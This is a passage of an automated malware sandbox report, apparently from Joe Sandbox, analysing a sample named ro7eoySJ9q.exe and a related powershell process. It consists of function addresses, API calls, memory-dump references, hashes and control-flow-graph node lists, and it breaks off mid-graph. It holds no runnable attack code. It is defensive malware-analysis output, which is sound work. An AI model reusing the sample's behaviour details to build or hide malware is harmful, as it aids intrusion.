                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: Free$GlobalLibrary
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 1100898210-823278215
                                                        • Opcode ID: af6bb57c9087681c5df9a6583299814f0cea52fc49ac98f0490cfdd2588b3981
                                                        • Instruction ID: 198638f61427fefc2148c68e53f1161767bd25bd987848fccacf8e5b1a1d3e49
                                                        • Opcode Fuzzy Hash: af6bb57c9087681c5df9a6583299814f0cea52fc49ac98f0490cfdd2588b3981
                                                        • Instruction Fuzzy Hash: C1E08C3250112067CA315F65E90472AB76CAF4AB22F05442AE8807B36087745C534BC8
                                                        Function 004057FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402D6B,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ro7eoySJ9q.exe,C:\Users\user\Desktop\ro7eoySJ9q.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 00405800
                                                        • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402D6B,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ro7eoySJ9q.exe,C:\Users\user\Desktop\ro7eoySJ9q.exe,80000000,00000003,?,?,?,00000000,004033FE), ref: 00405810
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrlen
                                                        • String ID: C:\Users\user\Desktop
                                                        • API String ID: 2709904686-1246513382
                                                        • Opcode ID: cb74b58fbf665d9c84b1068e3f9d72a75ce1c9c55f4980f1e918d92df7a9c5c8
                                                        • Instruction ID: 957e04025a41c1941cffb014cac20df3e0ff5def3477a48c76d927f6f21090a4
                                                        • Opcode Fuzzy Hash: cb74b58fbf665d9c84b1068e3f9d72a75ce1c9c55f4980f1e918d92df7a9c5c8
                                                        • Instruction Fuzzy Hash: EED05EB3411D209AD3127B04DC04A9F67ACFF51300746846AE841A61A1D7B85C908AEC
                                                        Function 00405934 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00405B51,00000000,[Rename]), ref: 00405944
                                                        • lstrcmpiA.KERNEL32(?,?), ref: 0040595C
                                                        • CharNextA.USER32(?,?,00000000,00405B51,00000000,[Rename]), ref: 0040596D
                                                        • lstrlenA.KERNEL32(?,?,00000000,00405B51,00000000,[Rename]), ref: 00405976
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                        • String ID:
                                                        • API String ID: 190613189-0
                                                        • Opcode ID: 8032f475193f702fb71f6f03d8a24b737fcdd57b3ef24890a40e5d8249ef00b0
                                                        • Instruction ID: d765cdcf26b5ece385e96dcd0ac43345a120d35f2bfa0d6b32256e58560247d7
                                                        • Opcode Fuzzy Hash: 8032f475193f702fb71f6f03d8a24b737fcdd57b3ef24890a40e5d8249ef00b0
                                                        • Instruction Fuzzy Hash: 60F09632504918FFC7129FA5DD00D9FBBA8EF163A4B2540BAE841F7211D674DE019F59

                                                        Execution Graph

                                                        Execution Coverage:6.1%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:3
                                                        Total number of Limit Nodes:0
                                                        execution_graph 37374 6e1d970 37375 6e1d9b3 SetThreadToken 37374->37375 37376 6e1d9e1 37375->37376

                                                        Executed Functions

                                                        Function 008CF520 Relevance: .1, Instructions: 76COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2688486556.00000000008CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008CD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_8cd000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e2be35a45e4b7b842b25577a976ad823ca7643674c81f7460ada40cee4ff5d88
                                                        • Instruction ID: a2757c03e79c99d4c36d4aa907270f9dfaf4db2afbab369fc1ff434a1c5c80b5
                                                        • Opcode Fuzzy Hash: e2be35a45e4b7b842b25577a976ad823ca7643674c81f7460ada40cee4ff5d88
                                                        • Instruction Fuzzy Hash: 9921D1755002049FEB05CF24D980F26BF76FB88318F24C5ADEA098A256C33AD856CB61
                                                        Function 06F8C0EF Relevance: 14.7, Strings: 11, Instructions: 994COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 6f8c0ef-6f8c101 1 6f8c16f-6f8c18b 0->1 2 6f8c103-6f8c162 0->2 7 6f8c18e-6f8c19a 1->7 31 6f8c168-6f8c16d 2->31 32 6f8cc59-6f8cc7a 2->32 9 6f8c19c 7->9 10 6f8c1a3-6f8c1c4 7->10 9->10 11 6f8c31d-6f8c33e 9->11 12 6f8c4e6-6f8c507 9->12 13 6f8c1f3-6f8c200 10->13 14 6f8c1c6-6f8c1eb 10->14 20 6f8c36d-6f8c37a 11->20 21 6f8c340-6f8c365 11->21 15 6f8c509-6f8c52e 12->15 16 6f8c536-6f8c618 12->16 18 6f8ca20-6f8ca65 13->18 19 6f8c206-6f8c227 13->19 14->13 15->16 110 6f8c8bb-6f8c8e6 16->110 111 6f8c61e-6f8c633 16->111 18->7 19->18 33 6f8c22d-6f8c316 19->33 20->18 22 6f8c380-6f8c3c0 20->22 21->20 61 6f8c3ca-6f8c3e8 call 6f856c6 22->61 31->1 36 6f8cca9-6f8ccb6 32->36 37 6f8cc7c-6f8cca1 32->37 33->11 40 6f8ccbc-6f8ccc4 36->40 41 6f8d372-6f8d3b7 36->41 37->36 42 6f8ccdc-6f8ccf4 40->42 43 6f8ccc6-6f8cccc 40->43 87 6f8d3bc-6f8d3d6 41->87 42->41 49 6f8ccfa-6f8cd0e 42->49 47 6f8ccce 43->47 48 6f8ccd0-6f8ccda 43->48 47->42 48->42 54 6f8cd3a 49->54 55 6f8cd10-6f8cd1c 49->55 62 6f8cd40-6f8cdbc 54->62 59 6f8cd1e-6f8cd24 55->59 60 6f8cd26-6f8cd36 55->60 65 6f8cd38 59->65 60->65 71 6f8c3ea-6f8c3fa 61->71 96 6f8cdbe-6f8cdca 62->96 97 6f8cde6 62->97 65->62 71->18 73 6f8c400-6f8c446 71->73 73->18 84 6f8c44c-6f8c4df 73->84 84->12 89 6f8d3d8-6f8d3fd 87->89 90 6f8d405-6f8d440 87->90 89->90 113 6f8d441 90->113 101 6f8cdcc-6f8cdd2 96->101 102 6f8cdd4-6f8cdda 96->102 104 6f8cdec-6f8ce43 97->104 106 6f8cde4 101->106 102->106 117 6f8ce72-6f8ce7f 104->117 118 6f8ce45-6f8ce6a 104->118 106->104 139 6f8c8eb-6f8c938 110->139 119 6f8c64d-6f8c675 111->119 120 6f8c635-6f8c63b 111->120 113->113 117->41 122 6f8ce85-6f8ce90 117->122 118->117 119->110 140 6f8c67b-6f8c69b 119->140 124 6f8c63d 120->124 125 6f8c63f-6f8c64b 120->125 128 6f8ce92-6f8ce9b 122->128 129 6f8ceb3 122->129 124->119 125->119 133 6f8ce9d-6f8cea0 128->133 134 6f8cea2-6f8ceaf 128->134 130 6f8ceb6-6f8ceea 129->130 145 6f8d23e-6f8d258 130->145 146 6f8cef0-6f8cf0a 130->146 137 6f8ceb1 133->137 134->137 137->130 139->18 140->110 148 6f8c6a1-6f8c6f1 140->148 151 6f8d25a-6f8d27f 145->151 152 6f8d287-6f8d294 145->152 149 6f8cf39-6f8cf70 146->149 150 6f8cf0c-6f8cf31 146->150 148->110 168 6f8c6f7-6f8c804 148->168 171 6f8d1f4-6f8d239 149->171 172 6f8cf76-6f8cf81 149->172 150->149 151->152 153 6f8d29a-6f8d2a5 152->153 154 6f8d334-6f8d370 152->154 158 6f8d2c8 153->158 159 6f8d2a7-6f8d2b0 153->159 154->87 165 6f8d2cb-6f8d32f 158->165 163 6f8d2b2-6f8d2b5 159->163 164 6f8d2b7-6f8d2c4 159->164 169 6f8d2c6 163->169 164->169 165->87 168->110 226 6f8c80a-6f8c853 168->226 169->165 171->87 176 6f8cfab 172->176 177 6f8cf83-6f8cf8f 172->177 182 6f8cfb1-6f8cfc4 176->182 179 6f8cf99-6f8cf9f 177->179 180 6f8cf91-6f8cf97 177->180 185 6f8cfa9 179->185 180->185 182->171 187 6f8cfca-6f8cfd5 182->187 185->182 190 6f8cfff 187->190 191 6f8cfd7-6f8cfe3 187->191 196 6f8d005-6f8d018 190->196 194 6f8cfed-6f8cff3 191->194 195 6f8cfe5-6f8cfeb 191->195 199 6f8cffd 194->199 195->199 196->171 197 6f8d01e-6f8d070 196->197 209 6f8d09a 197->209 210 6f8d072-6f8d07e 197->210 199->196 214 6f8d0a0-6f8d0eb 209->214 212 6f8d088-6f8d08e 210->212 213 6f8d080-6f8d086 210->213 216 6f8d098 212->216 213->216 214->171 224 6f8d0f1-6f8d10c 214->224 216->214 228 6f8d10e-6f8d114 224->228 229 6f8d126-6f8d1ca 224->229 226->110 240 6f8c855-6f8c870 226->240 231 6f8d118-6f8d124 228->231 232 6f8d116 228->232 229->171 249 6f8d1cc-6f8d1cf 229->249 231->229 232->229 244 6f8c87a-6f8c88c 240->244 246 6f8c896-6f8c8b9 244->246 246->139 251 6f8d1d9-6f8d1e5 249->251 252 6f8d1ef 251->252 252->87
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (fsl$(fsl$4']q$4']q$4']q$4']q$4pl$4pl$x.dk$x.dk$-dk
                                                        • API String ID: 0-549173673
                                                        • Opcode ID: 6f53c16691d677f40dfc64415d3b57f8392bd2fd701e4975256fa831bff9e2df
                                                        • Instruction ID: 9ea4d31ad010603e20ed7984ffddfb189d2e9bfe0df6be214fb4fd3dd7574b6b
                                                        • Opcode Fuzzy Hash: 6f53c16691d677f40dfc64415d3b57f8392bd2fd701e4975256fa831bff9e2df
                                                        • Instruction Fuzzy Hash: 6F924E74A00214DFD764DB58CD91BAABBB2EF85300F1491D5D909AB391CB72EE81CFA1
                                                        Function 06F87E20 Relevance: 10.4, Strings: 8, Instructions: 373COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 254 6f87e20-6f87e4d 255 6f87e4f-6f87e55 254->255 256 6f87e65-6f87eb8 254->256 257 6f87e59-6f87e63 255->257 258 6f87e57 255->258 263 6f87eba-6f87ed9 256->263 264 6f87ee1-6f87eeb 256->264 257->256 258->256 263->264 265 6f8839c-6f883e1 264->265 266 6f87ef1-6f87f05 264->266 288 6f8840a-6f88442 265->288 289 6f883e3-6f88402 265->289 266->265 267 6f87f0b-6f87f10 266->267 269 6f87f28-6f87f34 267->269 270 6f87f12-6f87f18 267->270 269->265 274 6f87f3a-6f87f3f 269->274 272 6f87f1a 270->272 273 6f87f1c-6f87f26 270->273 272->269 273->269 275 6f87f41-6f87f47 274->275 276 6f87f57-6f87f63 274->276 280 6f87f49 275->280 281 6f87f4b-6f87f55 275->281 276->265 278 6f87f69-6f87fb0 276->278 292 6f87fca-6f87ff6 278->292 293 6f87fb2-6f87fb8 278->293 280->276 281->276 303 6f88443 288->303 289->288 292->265 304 6f87ffc-6f88001 292->304 295 6f87fba 293->295 296 6f87fbc-6f87fc8 293->296 295->292 296->292 303->303 305 6f88019-6f880aa 304->305 306 6f88003-6f88009 304->306 318 6f8824f-6f88274 305->318 319 6f880b0-6f880e4 305->319 307 6f8800b 306->307 308 6f8800d-6f88017 306->308 307->305 308->305 329 6f88279-6f882bd 318->329 319->318 324 6f880ea-6f8810b 319->324 327 6f8810d-6f88113 324->327 328 6f88125-6f88127 324->328 330 6f88115 327->330 331 6f88117-6f88123 327->331 332 6f88129-6f8812f 328->332 333 6f88141-6f88163 328->333 329->265 330->328 331->328 335 6f88131 332->335 336 6f88133-6f8813f 332->336 333->318 343 6f88169-6f8818a 333->343 335->333 336->333 346 6f8818c-6f88192 343->346 347 6f881a4-6f881a6 343->347 348 6f88194 346->348 349 6f88196-6f881a2 346->349 350 6f881a8-6f881ae 347->350 351 6f881c0-6f8820b 347->351 348->347 349->347 352 6f881b0 350->352 353 6f881b2-6f881be 350->353 351->318 360 6f8820d-6f88223 351->360 352->351 353->351 362 6f8822d-6f8824d 360->362 362->329
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (fsl$(fsl$4']q$4']q$4']q$4']q$x.dk$-dk
                                                        • API String ID: 0-4215828846
                                                        • Opcode ID: 0f1f934cf59d87b14134b1d3432ea95e67d18cceb4bca781a9b6e19bdc94c070
                                                        • Instruction ID: d70f8cb92316410f8b2a1dd68feebdf6c35886b486cc2eb3c3a0db3fc4b3c693
                                                        • Opcode Fuzzy Hash: 0f1f934cf59d87b14134b1d3432ea95e67d18cceb4bca781a9b6e19bdc94c070
                                                        • Instruction Fuzzy Hash: 1FE1BE70F002148FC754EB68C651BAEBBA2EF84300F64D469D9196F396CB36EC45CBA1
                                                        Function 06F87E01 Relevance: 6.6, Strings: 5, Instructions: 301COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 365 6f87e01-6f87e4d 366 6f87e4f-6f87e55 365->366 367 6f87e65-6f87eb8 365->367 368 6f87e59-6f87e63 366->368 369 6f87e57 366->369 374 6f87eba-6f87ed9 367->374 375 6f87ee1-6f87eeb 367->375 368->367 369->367 374->375 376 6f8839c-6f883e1 375->376 377 6f87ef1-6f87f05 375->377 399 6f8840a-6f88442 376->399 400 6f883e3-6f88402 376->400 377->376 378 6f87f0b-6f87f10 377->378 380 6f87f28-6f87f34 378->380 381 6f87f12-6f87f18 378->381 380->376 385 6f87f3a-6f87f3f 380->385 383 6f87f1a 381->383 384 6f87f1c-6f87f26 381->384 383->380 384->380 386 6f87f41-6f87f47 385->386 387 6f87f57-6f87f63 385->387 391 6f87f49 386->391 392 6f87f4b-6f87f55 386->392 387->376 389 6f87f69-6f87fb0 387->389 403 6f87fca-6f87ff6 389->403 404 6f87fb2-6f87fb8 389->404 391->387 392->387 414 6f88443 399->414 400->399 403->376 415 6f87ffc-6f88001 403->415 406 6f87fba 404->406 407 6f87fbc-6f87fc8 404->407 406->403 407->403 414->414 416 6f88019-6f880aa 415->416 417 6f88003-6f88009 415->417 429 6f8824f-6f88274 416->429 430 6f880b0-6f880e4 416->430 418 6f8800b 417->418 419 6f8800d-6f88017 417->419 418->416 419->416 440 6f88279-6f882bd 429->440 430->429 435 6f880ea-6f8810b 430->435 438 6f8810d-6f88113 435->438 439 6f88125-6f88127 435->439 441 6f88115 438->441 442 6f88117-6f88123 438->442 443 6f88129-6f8812f 439->443 444 6f88141-6f88163 439->444 440->376 441->439 442->439 446 6f88131 443->446 447 6f88133-6f8813f 443->447 444->429 454 6f88169-6f8818a 444->454 446->444 447->444 457 6f8818c-6f88192 454->457 458 6f881a4-6f881a6 454->458 459 6f88194 457->459 460 6f88196-6f881a2 457->460 461 6f881a8-6f881ae 458->461 462 6f881c0-6f8820b 458->462 459->458 460->458 463 6f881b0 461->463 464 6f881b2-6f881be 461->464 462->429 471 6f8820d-6f88210 462->471 463->462 464->462 472 6f8821a-6f88223 471->472 473 6f8822d-6f8824d 472->473 473->440
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (fsl$4']q$4']q$x.dk$-dk
                                                        • API String ID: 0-401039236
                                                        • Opcode ID: 713e76de46837449bdd33542f53a12d6ebf6563fa242921b8adde39091579c45
                                                        • Instruction ID: 3ee15fba70f6b1b029235d3cf3d50549bc8e854007ff90746d2847ca10634de2
                                                        • Opcode Fuzzy Hash: 713e76de46837449bdd33542f53a12d6ebf6563fa242921b8adde39091579c45
                                                        • Instruction Fuzzy Hash: A2C1BF70E002148FC754EF58C941BAEBBB2AF89340F64D499E5196F356CB36EC45CBA1
                                                        Function 06F86478 Relevance: 5.7, Strings: 4, Instructions: 711COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 476 6f86478-6f864a7 477 6f8727d-6f8728b 476->477 478 6f864ad-6f864b5 476->478 479 6f864d6 478->479 480 6f864b7-6f864c0 478->480 484 6f864d9-6f864e6 479->484 481 6f864c2-6f864c5 480->481 482 6f864c7-6f864ca 480->482 485 6f864d4 481->485 482->485 484->477 486 6f864ec-6f864f4 484->486 485->484 487 6f86515 486->487 488 6f864f6-6f864ff 486->488 491 6f86518-6f86525 487->491 489 6f86501-6f86504 488->489 490 6f86506-6f86509 488->490 493 6f86513 489->493 490->493 491->477 492 6f8652b-6f86533 491->492 494 6f86554 492->494 495 6f86535-6f8653e 492->495 493->491 498 6f86557-6f8656a 494->498 496 6f86540-6f86543 495->496 497 6f86545-6f86548 495->497 499 6f86552 496->499 497->499 498->477 500 6f86570-6f86575 498->500 499->498 501 6f8658d-6f865b1 500->501 502 6f86577-6f8657d 500->502 505 6f865e3-6f865f0 501->505 506 6f865b3-6f865e0 501->506 503 6f8657f 502->503 504 6f86581-6f8658b 502->504 503->501 504->501 505->477 507 6f865f6-6f865fb 505->507 506->505 509 6f865fd-6f86603 507->509 510 6f86613-6f8664a 507->510 512 6f86605 509->512 513 6f86607-6f86611 509->513 510->477 517 6f86650-6f86658 510->517 512->510 513->510 518 6f8665a-6f86660 517->518 519 6f86670-6f866c6 517->519 520 6f86662 518->520 521 6f86664-6f8666e 518->521 527 6f866cc-6f866ef 519->527 528 6f87261-6f8726d 519->528 520->519 521->519 531 6f866f2-6f866fe 527->531 532 6f86700 531->532 533 6f86707-6f86728 531->533 532->533 534 6f86a4a-6f86a6b 532->534 535 6f86881-6f868a2 532->535 536 6f8672a-6f8674f 533->536 537 6f86757-6f86764 533->537 540 6f86a9a-6f86b3a 534->540 541 6f86a6d-6f86a92 534->541 538 6f868d1-6f868de 535->538 539 6f868a4-6f868c9 535->539 536->537 542 6f8701a-6f87056 537->542 543 6f8676a-6f8678b 537->543 538->542 544 6f868e4-6f8695e 538->544 539->538 578 6f86e8d-6f86eb5 540->578 579 6f86b40-6f86b7d 540->579 541->540 542->531 543->542 552 6f86791-6f8687a 543->552 544->542 569 6f86964-6f869b0 544->569 552->535 569->542 577 6f869b6-6f86a43 569->577 577->534 596 6f86eba-6f86f07 578->596 579->578 589 6f86b83-6f86ba4 579->589 593 6f86bbe-6f86bc0 589->593 594 6f86ba6-6f86bac 589->594 599 6f86bda-6f86c02 593->599 600 6f86bc2-6f86bc8 593->600 597 6f86bae 594->597 598 6f86bb0-6f86bbc 594->598 596->542 597->593 598->593 599->578 612 6f86c08-6f86c0d 599->612 603 6f86bca 600->603 604 6f86bcc-6f86bd8 600->604 603->599 604->599 613 6f86c0f-6f86c15 612->613 614 6f86c25-6f86c38 612->614 616 6f86c19-6f86c23 613->616 617 6f86c17 613->617 614->578 618 6f86c3e-6f86c43 614->618 616->614 617->614 619 6f86c5b-6f86c98 618->619 620 6f86c45-6f86c4b 618->620 619->578 625 6f86c9e-6f86ca9 619->625 622 6f86c4d 620->622 623 6f86c4f-6f86c59 620->623 622->619 623->619 627 6f86cab-6f86cb1 625->627 628 6f86cc1-6f86d99 625->628 629 6f86cb3 627->629 630 6f86cb5-6f86cbf 627->630 628->578 641 6f86d9f-6f86dc6 628->641 629->628 630->628 644 6f86dc8-6f86dce 641->644 645 6f86de0-6f86e25 641->645 646 6f86dd0 644->646 647 6f86dd2-6f86dde 644->647 645->578 652 6f86e27-6f86e42 645->652 646->645 647->645 654 6f86e4c-6f86e5e 652->654 655 6f86e68-6f86e8b 654->655 655->596
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4']q$4']q$x.dk$-dk
                                                        • API String ID: 0-1872766135
                                                        • Opcode ID: 17f564762c47e50a630720832ae4964647cc410abeb73e3843007d6c6799a49a
                                                        • Instruction ID: bd7382e7b72de9494df6f20b7ca03642608387ae1eba46811bb6c84d1f94fdce
                                                        • Opcode Fuzzy Hash: 17f564762c47e50a630720832ae4964647cc410abeb73e3843007d6c6799a49a
                                                        • Instruction Fuzzy Hash: EA625A74E002148FD794DF58C991BAABBB2EB85300F14D099D9099F396CB72ED85CBA1
                                                        Function 06F8CAC1 Relevance: 5.4, Strings: 4, Instructions: 425COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 658 6f8cac1-6f8cac4 659 6f8caab-6f8cab0 658->659 660 6f8cac6 658->660 664 6f8cc59-6f8cc7a 659->664 661 6f8cac8-6f8caf4 660->661 662 6f8cb34-6f8cb43 660->662 680 6f8cafd 661->680 681 6f8caf6-6f8cafb 661->681 665 6f8cb4b-6f8cb58 662->665 669 6f8cca9-6f8ccb6 664->669 670 6f8cc7c-6f8cca1 664->670 667 6f8cb5e-6f8cb63 665->667 668 6f8d372-6f8d3b7 665->668 671 6f8cb7b-6f8cb8d 667->671 672 6f8cb65-6f8cb6b 667->672 715 6f8d3bc-6f8d3d6 668->715 669->668 674 6f8ccbc-6f8ccc4 669->674 670->669 671->668 679 6f8cb93-6f8cba1 671->679 677 6f8cb6d 672->677 678 6f8cb6f-6f8cb79 672->678 675 6f8ccdc-6f8ccf4 674->675 676 6f8ccc6-6f8cccc 674->676 675->668 686 6f8ccfa-6f8cd0e 675->686 684 6f8ccce 676->684 685 6f8ccd0-6f8ccda 676->685 677->671 678->671 687 6f8cbb9-6f8cc48 679->687 688 6f8cba3-6f8cba9 679->688 696 6f8cb02-6f8cb1c 680->696 681->696 684->675 685->675 691 6f8cd3a 686->691 692 6f8cd10-6f8cd1c 686->692 687->664 693 6f8cbab 688->693 694 6f8cbad-6f8cbb7 688->694 701 6f8cd40-6f8cdbc 691->701 698 6f8cd1e-6f8cd24 692->698 699 6f8cd26-6f8cd36 692->699 693->687 694->687 696->665 702 6f8cb1e-6f8cb2a 696->702 705 6f8cd38 698->705 699->705 725 6f8cdbe-6f8cdca 701->725 726 6f8cde6 701->726 702->662 705->701 718 6f8d3d8-6f8d3fd 715->718 719 6f8d405-6f8d440 715->719 718->719 733 6f8d441 719->733 727 6f8cdcc-6f8cdd2 725->727 728 6f8cdd4-6f8cdda 725->728 729 6f8cdec-6f8ce43 726->729 731 6f8cde4 727->731 728->731 735 6f8ce72-6f8ce7f 729->735 736 6f8ce45-6f8ce6a 729->736 731->729 733->733 735->668 737 6f8ce85-6f8ce90 735->737 736->735 739 6f8ce92-6f8ce9b 737->739 740 6f8ceb3 737->740 742 6f8ce9d-6f8cea0 739->742 743 6f8cea2-6f8ceaf 739->743 741 6f8ceb6-6f8ceea 740->741 748 6f8d23e-6f8d258 741->748 749 6f8cef0-6f8cf0a 741->749 744 6f8ceb1 742->744 743->744 744->741 752 6f8d25a-6f8d27f 748->752 753 6f8d287-6f8d294 748->753 750 6f8cf39-6f8cf70 749->750 751 6f8cf0c-6f8cf31 749->751 767 6f8d1f4-6f8d239 750->767 768 6f8cf76-6f8cf81 750->768 751->750 752->753 754 6f8d29a-6f8d2a5 753->754 755 6f8d334-6f8d370 753->755 757 6f8d2c8 754->757 758 6f8d2a7-6f8d2b0 754->758 755->715 764 